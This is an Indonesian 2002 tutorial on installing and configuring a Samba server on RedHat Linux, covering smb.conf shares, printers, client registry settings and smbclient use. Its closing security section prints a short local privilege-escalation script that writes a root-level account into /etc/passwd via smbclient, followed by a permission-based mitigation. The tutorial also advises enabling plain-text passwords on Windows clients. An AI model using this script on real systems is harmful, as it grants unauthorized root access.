http://upk.fi.itb.ac.

id/~reyza
reyza@upk.fi.itb.ac.id – m_reza_faisal@yahoo.com
© Copyright 2002 reyza

Konfigurasi Samba Server

Pada sistem operasi MS Windows dikenal suatu protokol untuk berkomunikasi.
Protokol ini digunakan untuk keperluan sharing resource pada sistem operasi MS
Windows seperti disk drive dan printer. Protokol ini dikenal dengan nama Server
Message Block (SMB). Awalnya protokol ini hanya digunakan untuk komunikasi antar
keluarga sistem operasi MS Windows saja. Sampai akhirnya protokol SMB dibuat agar
bisa digunakan pada sistem operasi non MS Windows, seperti Linux. Pada Linux,
protokol ini dikenal dengan nama Samba.
Dengan menggunakan Samba, Linux bisa menjadi mesin untuk SMB client atau server.
Linux dapat dikonfigurasikan sedemikian rupa untuk keperluan sharing disk drive dan
printer, sehingga dapat diakses oleh komputer dengan sistem operasi MS Windows dan
Linux. Keuntungan yang didapat tentunya komunikasi dan sharing resource pada
komputer antar sistem operasi yang berbeda bukan menjadi masalah lagi. Dengan
menggunakan fasilitas Network Neighborhood yang terdapat pada sistem operasi MS
Windows, resource yang telah di-sharing oleh Samba Server dapat diakses.
Proses installasi dan konfigurasi yang dijelaskan pada tulisan ini dilakukan pada sistem
operasi Linux RedHat.

Installasi
Untuk membangun Samba Server, harus dipastikan dulu bahwa paket-paket Samba
sudah diinstall. Untuk memeriksa dapat menggunakan perintah :
rpm –qa | grep samba
Apabila paket-paket Samba sudah diinstall maka keluaran dari perintah di atas adalah
:
samba-common-version.i386.rpm
samba-version.i386.rpm
samba-client-version.i386.rpm
Apabila perintah di atas tidak mengeluarkan output, artinya paket-paket Samba belum
diinstall. Untuk melakukan penginstallan paket-paket tersebut digunakan perintah :
rpm –ivh samba-common-version.i386.rpm
rpm –ivh samba-version.i386.rpm
rpm –ivh samba-client-version.i386.rpm
Paket samba-version.i386.rpm dan samba-common-version.i386.rpm adalah paket
untuk Samba Server. Sedangkan samba-client-version.i386.rpm merupakan paket
untuk Samba client. Samba client digunakan untuk mengakses Samba Server atau
untuk mengakses drive dan printer yang disharing pada mesin dengan sistem operasi
MS Windows.
Setelah paket-paket samba diinstall, agar mesin Linux menjadi Samba Server perlu
dihidupkan service Samba Server tersebut. Untuk melihat status digunakan perintah :
/etc/rc.d/init.d/smb status
Sedangkan untuk menghidupkan service Samba Server digunakan perintah :
/etc/rc.d/init.d/smb start
dan untuk mematikan service digunakan perintah :
/etc/rc.d/init.d/smb stop
Setelah melakukan modifikasi konfigurasi pada file smb.conf maka untuk mengaktifkan
perubahan tersebut, Samba Server perlu di restart dengan perintah :
/etc/rc.d/init.d/smb restart

Konfigurasi
Konfigurasi Samba Server terletak pada file smb.conf. Pada Linux RedHat biasanya
file ini terletak pada direktori /etc atau /etc/samba. Penulisan konfigurasi pada file
http://upk.fi.itb.ac.id/~reyza
reyza@upk.fi.itb.ac.id – m_reza_faisal@yahoo.com
© Copyright 2002 reyza

ini tidak bersifat case sensitive, jadi tidak ada perbedaan pemakainan huruf besar dan
kecil. Tanda # dan ; pada file ini digunakan untuk memberikan komentar atau untuk
menonaktifkan suatu baris pada file agar tidak dijalankan.
Pada smb.conf, secara garis besar tiga bagian penting yaitu :
[global]
[homes]
[printers]

Konfigurasi [global]
Bagian ini berisi pendefinisian parameter-parameter yang digunakan oleh seluruh
bagian-bagian pada file ini.
[global]
workgroup = Asisten
server-string = UPK Samba Server
printcap name = /etc/printcap
load printers = yes
log file = /var/log/samba/log.%m
max log size = 50
security = user
socket option = TCP_NODELAY

Penjelasan untuk tiap baris yang terdapat pada bagian [global] adalah sebagai
berikut :
1. Baris pertama yaitu Asisten merupakan nama workgroup atau nama domain bagi
Windows NT. Nama ini akan saat Network Neighborhood di-browse.
2. Baris kedua merupakan penjelasan atau deskripsi yang diberikan untuk Samba
Server.
3. Baris ketiga /etc/printcap digunakan untuk menentukan file printcap yang akan
digunakan oleh printer yang ada di Linux.
4. Baris keempat dignakan untuk keperluan sharing printer kepada client secara
otomatis setiap kali service Samba Server dihidupkan.
5. Baris kelima merupakan nama file log yang akan digunakan saat client melakukan
koneksi ke Samba Server. Tanda %m menyatakan nama untuk client. Sebagai
contoh, apabila komputer client bernama darksides sedang melakukan koneksi ke
server maka file log-nya akan bernama /var/log/samba/log.darksides.
6. Baris keenam merupakan batasan yang digunakan untuk menentukan ukuran
maksimum file log dalam ukuran KB.
7. Baris keenam adalah bagian yang digunakan untuk proses autentikasi client.
Bagian ini memiliki beberapa kemungkinan, yaitu:
user
share
server

Apabila security diset ke user atau server, Samba Server akan meminta user
untuk memasukkan username dan password yang sama dengan username dan
password yang terdaftar pada server pada saat user mengakses Samba Server.
Sedangkan apabila security diset ke share maka Samba Server akan meminta
password hanya apabila user ingin mengakses home direktori dari client.
8. Bagian socket option digunakan untuk meningkatkan unjuk kerja Samba.
http://upk.fi.itb.ac.id/~reyza
reyza@upk.fi.itb.ac.id – m_reza_faisal@yahoo.com
© Copyright 2002 reyza

Apabila service Samba Server dihidupkan maka dipastikan bahwa nama mesin Samba
Server akan dapat dilihat pada saat Network Netborhood di-browse.

Gambar 1. UPK Samba Server pada window explorer

Konfigurasi [homes]

Bagian ini digunakan untuk menentukan home direktori yang dapat diakses dari
Windows atau mesin Samba client. Sehingga setiap user yang memiliki login di Linux
dapat mengakses home direktori-nya dari Windows atau mesin Samba client. Berikut
adalah konfigurasi pada bagian [homes] :
[homes]
comment = Home direktori user
browseable = yes
writeable = yes

Penjelasan untuk tiap baris pada bagian [homes] sebagai berikut :

1. Baris pertama yaitu comment, adalah komentar yang dapat dituliskan sebagai
keterangan dari direktori yang di-sharing.
2. Baris kedua yaitu browseable untuk menentukan apakah direktori yang akan
diakses dapat dilihat dengan browser yang terdapat pada Network Neighborhood.
3. Baris ketiga untuk menentukan apakah home direktori user tersebut dapat ditulisi
atau tidak oleh user.
Konfigurasi di atas akan menampilkan home direktori dari user yang ada pada Server
Linux. Selain itu Samba Server juga melakukan sharing direktori tertentu. Konfigurasi
berikut di bawah akan melakukan sharing direktori yang dipakai untuk menyimpan file-
file atau data-data pada home direktori FTP Server.
http://upk.fi.itb.ac.id/~reyza
reyza@upk.fi.itb.ac.id – m_reza_faisal@yahoo.com
© Copyright 2002 reyza

Gambar 2. Home direktori user yang ditampilkan pada Windows explorer.

[Data FTP]
comment = Data FTP
path = /private/data/ftp
guest ok = yes
writable = no
share modes = no

Pada konfigurasi ini ditentukan path yang ingin disharing yaitu di /private/data/ftp
yaitu home direktori dari FTP Server.
http://upk.fi.itb.ac.id/~reyza
reyza@upk.fi.itb.ac.id – m_reza_faisal@yahoo.com
© Copyright 2002 reyza

Gambar 3. Home direktori FTP Server yand di-sharing dengan nama Data FTP

Konfigurasi [printer]
Apabila pada Linux sudah terinstall sebuah printer atau lebih. Maka untuk sharing
printer tersebut agar bisa digunakan oleh komputer client harus dilakukan konfigurasi
pada bagian ini. Berikut adalah konfigurasi untuk bagian ini
[printers]
comment = UPK Printer
path = /var/spool/samba
browseable = no
guest ok = no
printable = yes
Penjelasan konfigurasi di atas adalah sebagai berikut :
1. Baris pertama digunakan untuk komentar atau keterangan untuk printer.
2. Baris kedua menyatakan direktori file spool untuk printer.
3. Baris ketiga digunakan untuk menentukan apakah printer dapat di-browse dari
browser.
4. Baris keempat digunakan untuk memberikan izin kepada user agar dapat
memanfaatkan printer tanpa harus memasukkan password.
5. Baris terakhir merupakan bagian yang penting karena bagian ini akan menentukan
apakah printer dapat dipakai untuk mencetak atau tidak.
Konfigurasi pada komputer client
Apabila pada bagian [global] untuk bagian security diset ke user, artinya komputer
client akan memberikan plain-text-password bersama dengan nama user. Agar
komputer client yang memakai sistem operasi MS Windows mengirim password
dengan format plain-text perlu dilakukan modifikasi pada registry. Langkah-langkah
yang dilakukan untuk melakukan modifikasi adalah sebagai berikut :
1. Jalankan regedit untuk menampilkan Windows Registry editor.
http://upk.fi.itb.ac.id/~reyza
reyza@upk.fi.itb.ac.id – m_reza_faisal@yahoo.com
© Copyright 2002 reyza

2. Tambahkan DWORD Value pada bagian :

/HKEY_LOCAL_MACHINE
/System
/CurrentControlSet
/Services
/VxD
/VNETSUP
3. Rename “New Value #1” dengan “EnablePlainTextPassword” dan beri nilai 1
dengan cara meng-klik dua kali pada nama baru ini.
4. Keluar dari Windows Regestry editor dan Reboot sistem.
Samba Client
Selain berfungsi sebagai Samba Server, Linux juga menjadi SMB client. Untuk
mengakses drive Windows dari Linux digunakan perintah sebagai berikut :
smbmount //darksides/c /mnt/samba
Perintah di atas akan mengakses drive Windows dan akan diletakkan pada direktori
/mnt/samba pada Linux.
Selain perintah di atas, juga disediakan smbclient yang dapat dianalogikan dengan
FTP client.
smbclient //darksides/c

Keamanan
Bagian ini merupakan tambahan yang harus diperhatikan bagi pengguna server Samba
Server pada sistem operasi Linux RedHat. Berikut adalah script yang didapat dari
Internet :
#!/bin/sh
ln -s /etc/passwd /tmp/x.log
smbclient //localhost/"`perl -e '{print "\n\nreza::0:0::/:/bin/sh\n"}'`"
-n ../../../tmp/x -N

Dengan script di atas seorang user biasa dapat melakukan penulisan ke file
/etc/passwd dan melakukan penambahan user yang setingkat root (UID=0 dan
GID=0). Dengan modifikasi pada script tersebut tidak tertutup kemungkinan user
tersebut melakukan sesuatu yang cuma bisa dilakukan oleh root.
Langkah awal pengamanan untu masalah ini adalah melakukan pembatasan
penggunaan utilitas smbclient. Sebagai contoh smbclient hanya bisa digunakan oleh
group tertentu saja yang bisa dipercaya. Misalnya smbclient hanya bisa digunakan
oleh user pada group admin. Berikut adalah langkah yang dilakukan agar utilitas
smbclient hanya bisa digunakan oleh user pada group admin saja.
chown root.admin `which smbclient`
chmod 750 `which smbclient`

Selain di atas, masih banyak lagi masalah keamanan yang mungkin dimiliki oleh
service Samba Server yang sudah didokumentasi di internet. Hal itu menjadi seorang
administrator untuk mencari tahu demi keamanan sistem yang dikelola.